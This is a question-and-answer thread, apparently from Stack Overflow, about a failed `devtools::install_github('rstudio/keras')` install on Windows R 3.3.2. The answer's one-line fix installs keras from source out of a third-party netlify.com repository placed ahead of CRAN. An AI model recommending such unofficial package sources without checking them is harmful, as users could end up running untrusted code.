# Cannot install 'rstudio/keras'

Tags: r, rstudio, devtools

I am trying to install Keras for R from the RStudio Github repo. When I execute the command, `devtools::install_github("rstudio/keras")`, I get the following output:

> Downloading GitHub repo rstudio/keras@master from URL
>   https://api.github.com/repos/rstudio/keras/zipball/master Installation
>   failed: cannot open file
>   'C:/Users/----/AppData/Local/Temp/RtmpQ7pNms/devtools23383d0e4e74/rstudio-keras
>   4df554e/R/activations.R': No such file or directory

Indeed, the directory `R/` does no exist in this file. A possible problem could be that this is a work computer, but I *do* have admin privileges for this computer.

Below is the output from `sessionInfo()`. Thank you in advance!

```
R version 3.3.2 (2016-10-31)
Platform: x86_64-w64-mingw32/x64 (64-bit)
Running under: Windows 7 x64 (build 7601) Service Pack 1    

locale:
[1] LC_COLLATE=English_United States.1252  LC_CTYPE=English_United States.1252    LC_MONETARY=English_United States.1252 LC_NUMERIC=C                          
[5] LC_TIME=English_United States.1252        

attached base packages:
[1] stats     graphics  grDevices utils     datasets  methods   base         

other attached packages:
[1] dplyr_0.5.0  magrittr_1.5 plyr_1.8.4      

loaded via a namespace (and not attached):
 [1] httr_1.2.1      lazyeval_0.2.0  R6_2.2.0        assertthat_0.1  DBI_0.5-1       tools_3.3.2     withr_1.0.2     curl_2.3        tibble_1.2     
[10] memoise_1.1.0   Rcpp_0.12.8     git2r_0.18.0    digest_0.6.10   devtools_1.13.1
```

Comment: Sometimes I solved R installation problems starting R with administrators privileges.

Answer (score 4):

Try this:

```
install.packages("keras", type = "source", repos = c("https://cartographer-alba-50131.netlify.com/7536398b6aeebf87b8d128830d509b88a21a822c/repos", "https://cran.rstudio.com"))
```